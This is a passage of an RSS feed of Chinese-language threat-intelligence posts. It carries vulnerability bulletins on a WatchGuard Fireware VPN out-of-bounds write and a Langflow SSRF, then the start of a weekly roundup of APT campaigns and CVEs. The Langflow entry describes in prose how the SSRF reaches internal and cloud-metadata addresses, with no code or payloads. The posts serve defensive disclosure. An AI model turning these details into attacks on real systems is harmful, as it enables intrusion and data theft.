100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">04</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">WatchGuard Fireware OS 越界写入漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-14733）</span></span></p></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 76, 65);">严重</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00027" target="_blank">https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00027</a></span></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">WatchGuard 官方发布安全通告，披露了其 Fireware 操作系统存在越界写入漏洞，漏洞编号CVE-2025-14733。可导致未经身份验证的远程攻击者执行任意代码等危害。WatchGuard Fireware OS 是网络安全公司 WatchGuard 为其硬件防火墙和统一威胁管理设备开发的专有操作系统。 据官方描述，在 WatchGuard Firewar 操作系统中，当设备配置了使用 IKEv2 协议的移动用户 VPN 或配置了动态网关对等体的分支机构 VPN 时，其相关服务在处理网络数据包时存在内存安全缺陷。该缺陷使得攻击者可以向目标设备的 VPN 服务发送经过精心构造的数据包，触发越界写入操作，破坏内存完整性，从而导致远程代码执行，完全控制防火墙设备。 注：如果 Firebox 之前配置了使用 IKEv2 的移动用户 VPN 或使用 IKEv2 的分支机构 VPN，并且这两个配置已被删除，但如果仍然配置了连接到静态网关对等体的分支机构 VPN，则该 Firebox 可能仍然存在该漏洞。 目前该漏洞已存在在野利用。</span></p></div></div></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">05</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Langflow SSRF 服务器端请求伪造漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-68477）</span></span></p></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 169, 0);">高危</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://github.com/langflow-ai/langflow/security/advisories/GHSA-5993-7p27-66g5" target="_blank">https://github.com/langflow-ai/langflow/security/advisories/GHSA-5993-7p27-66g5</a></span></span></span></p><p><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://github.com/langflow-ai/langflow/security/advisories/GHSA-5993-7p27-66g5" target="_blank">https://github.com/langflow-ai/langflow/security/advisories/GHSA-5993-7p27-66g5</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">Langflow 被披露其存在 SSRF 服务器端请求伪造漏洞，漏洞编号CVE-2025-68477。可导致经过身份验证的远程攻击者利用工作流中的 API 请求组件，以服务器网络身份发起对内部网络或云元数据服务的请求并获取响应内容，造成敏感信息泄露等危害。LangFlow 是一个基于 Python 开发，并且不依赖于任何模型、API 或数据库的低代码应用程序构建工具，是 LangChain 的 GUI，为用户提供更方便的构建方式，可直接通过拖放组件和聊天框来实验和原型化流程。 据官方描述，在 Langflow 1.7.0 之前的版本中，其 API Request 组件在接收用户输入（来自工作流配置或运行时参数）的 URL 后，仅进行格式校验与协议标准化（如补全 <a href="https://），而未对目标地址实施任何网络边界检查（如阻止对本地回环地址" target="_blank">https://），而未对目标地址实施任何网络边界检查（如阻止对本地回环地址</a> 127.0.0.1、私有 IP 段 10.0.0.0/8、172.16.0.0/12、192.168.0.0/16 或云元数据地址的访问）。由于执行工作流的接口（/api/v1/run 及 /api/v1/run/advanced）仅需有效的 API 密钥即可调用，因此攻击者可通过构造包含恶意 URL 的工作流参数，使服务器端的 httpx 客户端代理其发起请求，并将完整的响应内容（包括响应体）返回给攻击者，从而实现非盲的服务器端请求伪造。 目前该漏洞的漏洞细节、POC已公开。</span></p></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="%27%27">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=0faddc72&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247510999%26idx%3D1%26sn%3D75224fcf9e5f821a6f5352b7a68b7b47">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 29 Dec 2025 16:30:00 +0800</pubDate>
    </item>
    <item>
      <title>情报每周回顾 2025-12-22</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247510994&amp;idx=1&amp;sn=82016050be2d5e70e1db54951dc74cf2</link>
      <description></description>
      <content:encoded><![CDATA[<p><span>腾讯威胁情报中心</span> <span>2025-12-22 18:54</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=c8b94799&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6AoQM3RKCWXia1xKyza7Ss8zBicD2yNRmw9icYzd75vXsxribMKvpTsLicwAvpbtY7GAJzfjISjhtBz2BUsELR8zkXw%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="template" mpa-from-tpl="t" data-mpa-action-id="md8hqhg218sw"><div data-mpa-template="t" mpa-from-tpl="t"><div data-mpa-category="模板" data-mpa-template-rows="1" yb-mpa-mark="mark-header" style="width: 100%;" data-mid="" data-mpa-template="t" mpa-from-tpl="t"><div style="width: 100%;display: flex;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;z-index: 1;padding: 0 5px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;display: flex;flex-direction: column;padding: 17px 10px 14px 10px;background: #FFFFFF;box-shadow: 0px 2px 4px 0px rgba(60, 131, 250, 0.15);" data-mid="" mpa-from-tpl="t"><div style="width: 100%;display: flex;align-items: flex-end;justify-content: space-between;padding: 0 0 3px 0;border-bottom: 1.3px dashed rgba(60, 131, 250, 0.3);" data-mid="" mpa-from-tpl="t"><p style="width: 47px;height: 9px;display: flex;justify-content: center;align-items: center;margin: 0 0 2px 0;flex-shrink: 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050100" class="rich_pages wxw-img" data-ratio="0.19148936170212766" data-w="94" src="https://wechat2rss.xlab.app/img-proxy/?k=0e691e32&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FHm2rIuksic6yohBk0Kia6W2Hhud1zoaEKFP2yZP0QHMxOicJykLUjiaiayTcgicdqhq5HURXYibhM3y7fMIZHZhMWn5ng%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 12px;color: rgba(60, 131, 250, 0.6);line-height: 17px;letter-spacing: 1px;word-break: break-word;" data-mid=""><span leaf="">腾讯云安全威胁情报中心</span></p></div></div><div style="width: 100%;padding: 14px 0 10px 0;display: flex;align-items: flex-start;justify-content: space-between;border-bottom: 1.3px dashed rgba(60, 131, 250, 0.3);" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p yb-mpa-mark="mark-header-title" style="font-weight: bold;font-size: 54px;color: #3C83FA;line-height: 55px;letter-spacing: 3px;word-break: break-word;" data-mid=""><span leaf="">摘要概览</span></p></div><div style="flex-shrink: 0;background: #3C83FA;width: 79px;padding: 3px 0 5px 0;display: flex;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="text-align: center;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 16px;color: #FFFFFF;line-height: 20px;word-break: break-word;" data-mid=""><span leaf="">每周一篇</span></p></div><div style="text-align: center;align-self: center;background: #FFFFFF;border-radius: 1px;padding: 2px 3px 1px 3px;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 14px;color: #3C83FA;line-height: 16px;word-break: break-word;" data-mid=""><span leaf="">情报追踪</span></p></div></div></div><div style="display: flex;align-items: flex-start;width: 100%;justify-content: space-between;padding: 18px 0 0 0;" data-mid="" mpa-from-tpl="t"><div style="display: flex;border-width: 1px;border-style: solid;border-color: rgba(40, 44, 51, 0.2);" data-mid="" mpa-from-tpl="t" data-mpa-action-id="md8kr8bk1rdn" data-pm-slice="0 0 []"><div style="text-align: center;padding: 1px 12px 0 9px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;color: #282C33;line-height: 21px;letter-spacing: 1px;word-break: break-word;" data-mid=""><span leaf="" mpa-font-style="md8kr8al1tgn" style="font-size: 14px;">2025年12月</span></p></div><div style="text-align: center;background: #3C83FA;padding: 1px 12px 0 12px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;color: #FFFFFF;line-height: 21px;word-break: break-word;" data-mid=""><span leaf="" mpa-font-style="md8krkjx1e1y" style="font-size: 11px;" data-mpa-action-id="md8krkkyw5a" data-pm-slice="0 0 []">12.15-12.21</span></p></div></div><p style="width: 80px;height: 14px;display: flex;justify-content: center;align-items: center;flex-shrink: 0;margin: 4px 0 0 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050097" class="rich_pages wxw-img" data-ratio="0.175" data-w="160" src="https://wechat2rss.xlab.app/img-proxy/?k=5a83ae18&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FchaiaZrj8iadrPWzLAFuXVKr31TUA1zIQs9pWSZ5jGicicdj7xjxPibjNcticLgOywtdWGic8tLqJ0fQF39tSd6nWoMXw%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p></div><p style="width: 10px;height: 9px;display: flex;justify-content: center;align-items: center;margin: 17px 0 -9px 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050104" class="rich_pages wxw-img" data-ratio="0.9" data-w="20" src="https://wechat2rss.xlab.app/img-proxy/?k=39f68913&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FnLKDrIxQFEEGkn0pFIwOMM5pPQzficCmVP1JWibI5z0miaKzMLYicUZkkF7N1PJkialw9IakBGQumOItHETEaaa0jRw%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p><div style="width: 100%;text-align: left;padding: 0 17px;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="md8hw5bc23fc" data-pm-slice="0 0 []"><p><span leaf="" mpa-font-style="md8hwswb23en" style="font-size: 16px;" data-mpa-action-id="md8hwswqeph" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【家族团伙事件】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:13px;"><p><span leaf="">APT28借伪造登录页实施长期钓鱼攻击，窃取用户敏感数据及情报收集</span></p></li><li style="font-size:13px;"><p><span leaf="">Play惯施双重勒索手段，索要赎金并威胁泄露或售卖所窃数据</span></p></li><li style="font-size:13px;"><p><span leaf="">RomCom伪装趋势科技发布虚假公告，针对关键基础设施发起多阶段鱼叉式钓鱼攻击</span></p></li><li style="font-size:13px;"><p><span leaf="">APT-C-36 利用内部邮箱信任绕过安全管控，实现对目标系统远程控制</span></p></li><li style="font-size:13px;"><p><span leaf="">Turla伪装官方命令实施高压钓鱼攻击，以恶意 HTML 附件窃取多组织敏感信息</span></p></li></ul><p><span leaf="" mpa-font-style="md8hx4foxsq" style="font-size: 16px;" data-mpa-action-id="md8hx4g416kq" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【热点攻击手段】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:13px;"><p><span leaf="">通过配置错误的边缘设备攻击关键组织，非法访问导致凭证泄露或业务中断</span></p></li><li style="font-size:13px;"><p><span leaf="">借 Chrome 零日漏洞及社交工程发起新型钓鱼，目标系统遭远程控制且敏感数据外泄</span></p></li><li style="font-size:13px;"><p><span leaf="">利用前端代码伪装突破安全，绕过多因素认证窃取企业凭证</span></p></li><li style="font-size:13px;"><p><span leaf="">首个AI勒索软件借gpt-oss:20b动态生成Lua脚本，可能引发数据不可访问、业务中断风险</span></p></li><li style="font-size:13px;"><p><span leaf="">伪装“NEW Purchase Order”PDF附件实施钓鱼攻击，网站及隐藏脚本窃取企业关键数据</span></p></li></ul><p><span leaf="" mpa-font-style="md8hxiy01bal" style="font-size: 16px;" data-mpa-action-id="md8hxiyhg7z" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">【重点漏洞情报】</span></span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li style="font-size:14px;font-weight:normal;"><p><span leaf="">React Server Components 拒绝服务漏洞（CVE-2025-67779）</span></p></li><li style="font-size:14px;font-weight:normal;"><p><span leaf="">Gogs 远程代码执行漏洞(CVE-2025-8110)</span></p></li><li style="font-size:14px;font-weight:normal;"><p><span leaf="">Vite Plugin RSC 任意文件读取漏洞（CVE-2025-68155）</span></p></li></ul></div><p style="width: 10px;height: 9px;display: flex;justify-content: center;align-items: center;align-self: flex-end;margin: -9px 0 0 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050102" class="rich_pages wxw-img" data-ratio="0.9" data-w="20" 